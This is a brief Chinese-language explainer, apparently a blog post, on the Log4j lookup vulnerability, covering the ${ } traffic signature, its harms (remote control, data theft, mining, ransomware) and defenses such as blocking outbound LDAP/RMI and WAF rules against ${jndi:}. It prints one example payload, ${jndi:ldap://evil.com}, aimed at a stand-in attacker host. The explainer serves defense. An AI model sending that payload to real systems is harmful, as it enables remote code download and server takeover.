log4j:是java的日志记录框架,用于把程序运行的各种信息写到控制台,文件,数据库或者远程服务中心
log4j:lookup功能,日志处理机制中动态资源加载功能被恶意的利用
流量特征:${ } 就像是一个“魔法咒语”,Log4j 看到它就会尝试执行里面的命令。
正常用法:${date} → 显示当前日期(无害)。
黑客用法:${jndi:ldap://evil.com} → 让服务器去黑客网站下载木马(危险!)
危害:远程控制服务器,获取敏感信息,被挖矿,作为跳板被横向,勒索
防御:封禁LDAP/RMI出站(网络隔离),改日志写法,避免日志直接拼接用户输入使用参数化查询,WAF规则 拦截${jndi:}及变种,防扫描和自动化攻击
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
